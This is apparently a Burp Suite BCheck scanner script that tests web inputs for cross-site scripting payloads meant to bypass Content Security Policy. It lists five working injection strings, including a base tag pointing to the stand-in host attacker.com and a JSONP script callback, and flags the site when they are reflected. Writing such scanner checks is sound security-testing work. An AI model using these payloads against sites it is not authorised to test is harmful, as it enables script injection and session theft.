metadata:
    language: v2-beta
    name: "XSS - CSP Bypass Vectors"
    description: "Tests XSS with payloads designed to bypass Content Security Policy restrictions"
    author: "BCheck Arsenal"
    tags: "xss", "csp-bypass", "waf-bypass"

run for each:
    payload = "<base href='https://attacker.com/'>",
        "<script src='https://accounts.google.com/o/oauth2/revoke?callback=alert(1)'></script>",
        "<meta http-equiv='refresh' content='0;url=javascript:alert(1)'>",
        "<object data='data:text/html,<script>alert(1)</script>'>",
        "<link rel=import href='data:text/html,<script>alert(1)</script>'>"

given insertion point then
    send payload:
        replacing: {payload}

    if not({latest.response.status_code} is "400") then
        if {latest.response} matches "(<base href|<meta http-equiv|<object data|<link rel)" then
            report issue:
                severity: high
                confidence: tentative
                detail: "Potential CSP bypass vector detected. Injected tags that can circumvent Content-Security-Policy are reflected."
                remediation: "Implement strict CSP with nonces or hashes. Avoid unsafe-inline and wildcards."
        end if
    end if